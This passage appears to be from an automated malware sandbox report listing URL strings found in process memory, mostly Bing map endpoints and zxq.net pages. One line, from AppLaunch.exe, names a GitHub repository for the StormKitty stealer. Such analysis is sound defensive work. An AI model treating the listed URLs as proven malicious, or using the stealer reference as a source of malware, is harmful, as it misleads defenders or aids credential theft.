                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340255237.000001401B842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340715628.000001401B85C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000020.00000002.340715628.000001401B85C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337301947.000001401B863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337483539.000001401B85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.338015519.000001401B841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000020.00000003.337412785.000001401B861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://fonts.googleapis.com/css?family=DM
                Source: AppLaunch.exe, 00000002.00000002.277032970.0000000007221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://news.google.com/publications/CAAqBwgKMJSRswswoazKAw?hl=en-US&gl=US&ceid=US%3Aen
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://schema.org
                Source: svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000020.00000002.339302995.000001401B813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.340148688.000001401B83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337977205.000001401B856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000020.00000003.337977205.000001401B856000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000020.00000002.340065799.000001401B83A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.313688080.000001401B831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000020.00000002.340646208.000001401B84D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337643299.000001401B840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.337917326.000001401B846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411158230.0000000003B24000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.408331910.0000000003B24000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537924053.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.374604090.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411195559.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/#logo
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/#organization
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/#website
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/?p=187
                Source: explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/?s=
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/about-us/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/best-mothers-day-gifts-of-2022-for-every-mom/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/contact-us/
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/feed/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/how-to-find-an-investor-for-your-business/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/business/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/entertainment/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/science-health/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/news/technology/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/online-shopping-tips-during-covid/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/privacy-policy/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/reasons-to-hire-a-truck-accident-attorney/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/the-future-of-cryptocurrency-is-it-time-to-get-your-crypto-license-in-europe/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/these-are-the-injured-you-may-suffer-in-a-bicycle-accident/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#breadcrumb
                Source: explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/#webpage
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/;
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/L
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/n
                Source: explorer.exe, 00000005.00000002.537973119.0000000003B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zxq.net/what-happened-to-the-old-zxq-website/ne
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/what-is-the-best-way-to-learn-golang/
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/why-you-should-seek-an-uber-or-lyft-accident-lawyer/
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2106
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2106
                Source: explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.411195559.0000000003B35000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/themes/smart-mag/css/icons/icons.css?ver=7.1.1
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01-768x432.jpeg
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Online-Shopping-Tips-During-Covid-01.jpeg
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-1024x576.jpe
                Source: explorer.exe, 00000005.00000003.444428026.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.339157472.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414179479.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375591680.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414485795.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.443490595.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.508841852.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.414107103.0000000003B52000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.337297943.0000000003B22000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.376094580.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.476931676.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.375713725.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.410951978.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.367687421.0000000003B26000.00000004.00000800.00020000.00000000.sdmp, cmsys.cmn.5.dr, what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-150x84.jpeg
                Source: what-happened-to-the-old-zxq-website[1].htm.5.drString found in binary or memory: https://zxq.net/wp-content/uploads/2022/07/Reasons-to-Hire-a-Truck-Accident-Attorney-01-300x169.jpeg
